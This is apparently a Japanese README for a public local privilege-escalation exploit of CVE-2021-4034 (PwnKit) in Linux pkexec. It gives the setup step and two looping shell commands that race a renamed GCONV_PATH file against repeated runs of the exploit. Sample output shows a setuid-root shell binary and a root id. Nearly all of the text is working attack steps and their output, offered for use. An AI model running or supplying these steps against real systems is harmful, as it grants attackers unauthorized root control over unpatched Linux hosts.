
CVE-2021-4034(PwnKit)のエクスプロイト。pkexec の競合状態を悪用して、Linux システム上で root への権限昇格を実現します。
Qualysチームによるpwnkit脆弱性のエクスプロイトです。
このエクスプロイトは、ターゲットマシンにgccが存在することを前提としています。
$ id
uid=1001(ayrx) gid=1002(ayrx) groups=1002(ayrx),27(sudo)
$ ./setup.sh
1つのbashセッションで以下のコマンドを実行します:
while :; do mv "GCONV_PATH=./value" "GCONV_PATH=./value.bak"; mv "GCONV_PATH=./value.bak" "GCONV_PATH=./value"; done
別のbashセッションで以下のコマンドを実行します:
while :; do ./exploit; done
最終的にレースに勝利し、rootアクセスを提供するshellバイナリを取得できます:
$ ls -lah shell
-rwsrwxrwx 1 root ayrx 16K Jan 26 08:57 shell
$ ./shell
# id
uid=0(root) gid=1002(ayrx) groups=1002(ayrx),27(sudo)
この手法に関する短い解説は、私のブログに掲載しています。